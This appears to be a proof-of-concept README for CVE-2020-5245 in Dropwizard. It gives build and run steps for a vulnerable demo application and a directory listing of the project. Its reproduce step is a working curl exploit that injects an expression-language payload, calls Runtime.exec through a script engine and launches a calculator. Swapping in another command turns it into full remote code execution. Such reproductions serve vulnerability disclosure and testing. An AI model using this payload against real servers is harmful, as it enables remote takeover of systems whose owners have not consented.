CVE-2020-5245
---
1. Run `mvn clean install` to build your application
1. Start application with `java -jar target/dropwizard-1.0-SNAPSHOT.jar server config.yml`
1. To check that your application is running enter url `http://localhost:8080`
some error in `pom.xml` plugins were not affected reproduce
## Reproduce
`curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}`
[4.0K] /data/pocs/85d74640cf43aa488787c591925f3c02d99445c6
├── [ 57] config.yml
├── [3.8K] dependency-reduced-pom.xml
├── [ 10K] dropwizard.iml
├── [5.0K] pom.xml
├── [ 604] README.md
├── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] moresec
│ │ ├── [4.0K] control
│ │ │ └── [1.5K] BookController.java
│ │ ├── [4.0K] dao
│ │ │ └── [1.1K] Book.java
│ │ ├── [4.0K] service
│ │ │ ├── [1.8K] BookService.java
│ │ │ └── [ 817] FailingSelfValidation.java
│ │ ├── [ 909] testApplication.java
│ │ └── [ 300] testConfiguration.java
│ └── [4.0K] resources
│ └── [ 200] banner.txt
└── [ 56K] start.png
9 directories, 13 files